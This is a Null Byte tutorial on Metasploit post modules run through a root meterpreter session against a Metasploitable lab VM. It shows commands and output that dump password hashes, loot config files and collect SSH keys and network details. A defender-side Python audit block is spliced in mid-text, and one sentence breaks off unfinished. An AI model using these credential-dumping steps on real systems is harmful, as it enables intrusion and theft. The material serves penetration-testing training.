
How to Quickly Gather Target Information with Metasploit Post Modules «Zero Byte :: WonderHowTo



Post-exploitation information gathering can be a long and drawn-out process, but it is an essential step when trying to pivot or establish advanced persistence. Every hacker should know how to enumerate a target manually, but sometimes it is worth it to automate the process.

In the previous tutorial, we used Metasploit's local exploit suggester to get root on the target. To use post modules, we need to have a meterpreter session running.

What Information Is Most Valuable to Attackers?

It has been said time and time again that reconnaissance is one of the most critical phases of an attack. It applies not only to the initial preparation for an attack, but also to the post-exploitation stage.

Some of the most valuable information to an attacker includes things like password hashes, credentials, and any other sensitive data that could be abused. Checking what defenses are in place, such as antivirus or firewall rules, is also a smart move.

Module 1: Hashdump

To get started, from the main prompt in Metasploit, use the sessions command to display the current sessions running in the background:

 msf5 > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                 Connection
  --  ----  ----                   -----------                                                 ----------
  1         shell cmd/unix                                                                     10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
  3         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  10.10.0.1:4321 -> 10.10.0.50:56950 (10.10.0.50)

Session 3 is ideal here since it is running as root.

To see the available post modules, we can start by typing the module path and then pressing Tab twice to see the autocomplete options:

 msf5 > use post/linux/gather/

use post/linux/gather/checkcontainer
use post/linux/gather/checkvm
use post/linux/gather/ecryptfs_creds
use post/linux/gather/enum_commands
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_protections
use post/linux/gather/enum_psk
use post/linux/gather/enum_system
use post/linux/gather/enum_users_history
use post/linux/gather/enum_xchat
use post/linux/gather/gnome_commander_creds
use post/linux/gather/gnome_keyring_dump
use post/linux/gather/hashdump
use post/linux/gather/mount_cifs_creds
use post/linux/gather/openvpn_credentials
use post/linux/gather/phpmyadmin_credsteal
use post/linux/gather/pptpd_chap_secrets
use post/linux/gather/tor_hiddenservices

The first module we will try is the hashdump module; this will dump the password hashes for all users on the system, which can then be cracked offline. Even though we've already got root on this machine,

Load the module with the use command:

 msf5 > use post/linux/gather/hashdump

We can now look at the options for this post module:

 msf5 post(linux/gather/hashdump) > options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Use the set command with the appropriate session number:

 msf5 post(linux/gather/hashdump) > set session 3

session => 3

Then, simply type run to launch it:

 msf5 post(linux/gather/hashdump) > run

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20190619120310_default_10.10.0.50_linux.hashes_719586.txt
[*] Post module execution completed
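As an added example (not part of the original tutorial and not Metasploit's own code), here is a short Python audit of the unshadowed format that hashdump writes, seen from the defender's side: it parses user:hash:uid:gid:gecos:home:shell lines and flags accounts still hashed with legacy MD5-crypt ($1$), extra UID 0 accounts, and system accounts that have both a password and an interactive shell. The sample entries are constructed, with dummy hash bodies.

```python
from collections import namedtuple

# crypt(3) prefix -> (algorithm, considered legacy). Unrecognised schemes are treated as legacy.
CRYPT_SCHEMES = {
    "$1$": ("md5-crypt", True),
    "$2a$": ("bcrypt", False), "$2b$": ("bcrypt", False), "$2y$": ("bcrypt", False),
    "$5$": ("sha256-crypt", False), "$6$": ("sha512-crypt", False), "$y$": ("yescrypt", False),
}
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh"}
Account = namedtuple("Account", "name hash uid gid gecos home shell")

def parse_unshadowed(text):
    """Parse 'user:hash:uid:gid:gecos:home:shell' lines, the unshadowed
    format hashdump stores in its loot file. Malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            continue
        name, h, uid, gid, gecos, home, shell = fields
        accounts.append(Account(name, h, int(uid), int(gid), gecos, home, shell))
    return accounts

def scheme_of(h):
    """Return (algorithm, legacy) for a crypt hash, or None if the account is locked."""
    if not h or h == "*" or h.startswith("!"):
        return None
    for prefix, info in CRYPT_SCHEMES.items():
        if h.startswith(prefix):
            return info
    if len(h) == 13 and "$" not in h:
        return ("des-crypt", True)  # traditional DES crypt: 13 characters, no '$' prefix
    return ("unknown", True)

def audit(accounts):
    """Return (account, reason) pairs a defender should act on after a hashdump."""
    findings = []
    for a in accounts:
        scheme = scheme_of(a.hash)
        if scheme is None:
            continue  # locked account: nothing to crack, nothing to rotate
        algo, legacy = scheme
        if legacy:
            findings.append((a.name, f"password stored with legacy {algo}; rehash on next login"))
        if a.uid == 0 and a.name != "root":
            findings.append((a.name, "extra UID 0 account; verify it is authorised"))
        if 0 < a.uid < 1000 and a.shell in INTERACTIVE_SHELLS:
            findings.append((a.name, "system account with a password and an interactive shell"))
    return findings

# Constructed sample in hashdump's output format (dummy hash bodies, not real credentials).
SAMPLE = """\
root:$1$AAAAAAAA$BBBBBBBBBBBBBBBBBBBBBB:0:0:root:/root:/bin/bash
backup:*:34:34:backup:/var/backups:/bin/sh
dbsvc:$6$CCCCCCCC$DDDDDDDDDDDDDDDDDDDDDD:110:115:db service,,,:/var/lib/db:/bin/bash
ops:$1$EEEEEEEE$FFFFFFFFFFFFFFFFFFFFFF:1001:1001:ops,,,:/home/ops:/bin/bash
toor:$6$GGGGGGGG$HHHHHHHHHHHHHHHHHHHHHH:0:0:second root:/root:/bin/bash
"""
FINDINGS = audit(parse_unshadowed(SAMPLE))  # runs against the constructed sample
print("\n".join(f"{name}: {reason}" for name, reason in FINDINGS))
```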

Module 2: Checkvm

The next module we will try is the checkvm module; this will check whether the target is running as a virtual machine.

Load the module:

 msf5 post(linux/gather/hashdump) > use post/linux/gather/checkvm

And take a look at the options:

 msf5 post(linux/gather/checkvm) > options

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Again, we only need to set a session number for this module to work. This time, we can use the setg command to set the option globally. That way, we do not have to keep typing in the same thing over and over again.

 msf5 post(linux/gather/checkvm) > setg session 3

session => 3

Type run to kick it off:

 msf5 post(linux/gather/checkvm) > run

[*] Gathering system info....
[+] This appears to be a 'VirtualBox' virtual machine
[*] Post module execution completed

Module 3: enum_protections

The next one we will try out is the enum_protections module; this will enumerate the system protections and security-related software installed on the target.

Load the module:

 msf5 post(linux/gather/checkvm) > use post/linux/gather/enum_protections

Since we set the session option earlier, it is already set for us when we look at the options:

 msf5 post(linux/gather/enum_protections) > options

Module options (post/linux/gather/enum_protections):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on.

 msf5 post(linux/gather/enum_protections) > run

[*] Running module against 10.10.0.50 [metasploitable]
[*] Info:
[*] [metasploitable ASCII-art banner] Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started
[*] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] Finding system protections...
[+] ASLR is enabled
[*] Finding installed applications...
[+] ufw found: /usr/sbin/ufw
[+] iptables found: /sbin/iptables
[+] logrotate found: /usr/sbin/logrotate
[+] tcpdump found: /usr/sbin/tcpdump
[+] aa-status found: /usr/sbin/aa-status
[*] Post module execution completed

This time we also get the system's banner, even though it comes out a little disjointed. It looks like the target has some firewall software and tcpdump installed, and ASLR is enabled.

Module 4: enum_configs

The next module we will try is the enum_configs module; this will gather any configuration files for commonly installed software.

Load the module:

 msf5 post(linux/gather/enum_protections) > use post/linux/gather/enum_configs

And run it:

 msf5 post(linux/gather/enum_configs) > run

[*] Running module against 10.10.0.50 [metasploitable]
[*] Info:
[*] [metasploitable ASCII-art banner] Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started
[*] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+] apache2.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt
[+] ports.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_670485.txt
[-] Failed to open file: /etc/nginx/nginx.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snort/snort.conf: core_channel_open: Operation failed: 1
[+] my.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_055449.txt
[+] ufw.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_162601.txt
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_122073.txt
[-] Failed to open file: /etc/security.access.conf: core_channel_open: Operation failed: 1
[+] shells stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_678197.txt
[-] Failed to open file: /etc/security/sepermit.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/ca-certificates.conf: core_channel_open: Operation failed: 1
[+] access.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_706115.txt
[-] Failed to open file: /etc/gated.conf: core_channel_open: Operation failed: 1
[+] rpc stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_755377.txt
[-] Failed to open file: /etc/psad/psad.conf: core_channel_open: Operation failed: 1
[+] debian.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_345601.txt
[-] Failed to open file: /etc/chkrootkit.conf: core_channel_open: Operation failed: 1
[+] logrotate.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_800174.txt
[-] Failed to open file: /etc/rkhunter.conf: core_channel_open: Operation failed: 1
[+] smb.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_570254.txt
[+] ldap.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_677851.txt
[-] Failed to open file: /etc/openldap/openldap.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/cups.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: Operation failed: 1
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_441838.txt
[-] Failed to open file: /etc/proxychains.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/snmp.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mail/sendmail.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snmp/snmp.conf: core_channel_open: Operation failed: 1
[*] Post module execution completed 

You can find all sorts of things like the Apache config, sysctl, smb, and others. Everything it finds is stored in the loot directory for later use. For instance, you can view the Apache config by catting the full path to the file:

 msf5 post(linux/gather/enum_configs) > cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

[*] exec: cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

#
# Based on the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do. They are here only as hints or reminders. If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
# 1. Directives that control the operation of the Apache server process as a
# whole (the 'global environment').
# 2. Directives that define the parameters of the 'main' or 'default' server,
# which responds to requests that are handled by a virtual host.
# These directives also provide default values for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, which allow web requests to be sent to
# different IP addresses or hostnames and have them handled by the
# same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

... 

Module 5: enum_network

The next module we'll run is the enum_network module; this will gather any network-related information on the target, such as IP addresses, routes, open ports, SSH configs, and DNS information.

Load the module:

 msf5 post(linux/gather/enum_configs) > use post/linux/gather/enum_network

And run it:

 msf5 post(linux/gather/enum_network) > run

[*] Running module against metasploitable.localdomain
[*] Module running as root
[+] Info:
[+] [metasploitable ASCII-art banner] Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started
[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] Collecting data ...
[+] Network config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt
[+] Route table stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_402588.txt
[+] Firewall config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_273816.txt
[+] DNS config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_884409.txt
[+] SSHD config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_100280.txt
[+] Host file stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_071264.txt
[+] SSH keys stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_372706.txt
[+] Active connections stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_029831.txt
[+] Wireless information stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_821137.txt
[+] Listening ports stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_676900.txt
[+] If-Up / If-Down stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_258463.txt
[*] Post module execution completed 

We have collected a plethora of network information, which could be useful to an attacker. For example, we can view the network config file:

 msf5 post(linux/gather/enum_network) > cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

[*] exec: cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

eth0      Link encap:Ethernet  HWaddr 08:00:27:77:62:6c
          inet addr:10.10.0.50  Bcast:10.10.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe77:626c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2643 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2139 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2268520 (2.1 MB)  TX bytes:361635 (353.1 KB)
          Base address:0xd010 Memory:f0000000-f0020000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:325 errors:0 dropped:0 overruns:0 frame:0
          TX packets:325 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:125465 (122.5 KB)

Module 6: enum_system

The last module we will cover today is the enum_system module; this will collect system information about the target, including the Linux version, installed packages, running services, cron jobs, and user accounts.

Load the module:

 msf5 post(linux/gather/enum_network) > use post/linux/gather/enum_system

And run it:

 msf5 post(linux/gather/enum_system) > run

[+] Info:
[+] [metasploitable ASCII-art banner] Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started
[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+] Module running as "root" user
[*] Linux version stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_406677.txt
[*] User accounts stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt
[*] Installed Packages stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_051826.txt
[*] Running Services stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_438719.txt
[*] Cron jobs stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_890911.txt
[*] Disk info stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_036761.txt
[*] Logfiles stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_749148.txt
[*] Setuid / setgid files stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_378666.txt
[*] Post module execution completed 

We can now look through the collected system information. For instance, here is the list of user accounts:

 msf5 post(linux/gather/enum_system) > cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

[*] exec: cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
libuuid
dhcp
syslog
klog
sshd
msfadmin
bind
postfix
ftp
postgres
mysql
tomcat55
distccd
user
service
telnetd
proftpd
statd 

Wrapping Up

Today, we used some of Metasploit's post modules to gather valuable information about the target. We saw how to check whether the system is a virtual machine, enumerate its protections, configuration files, network and system details, and even dump its password hashes. Metasploit makes the job quick and painless.


Cover image by Soumil Kumar / Pexels; Screenshots by drd_ / Null Byte
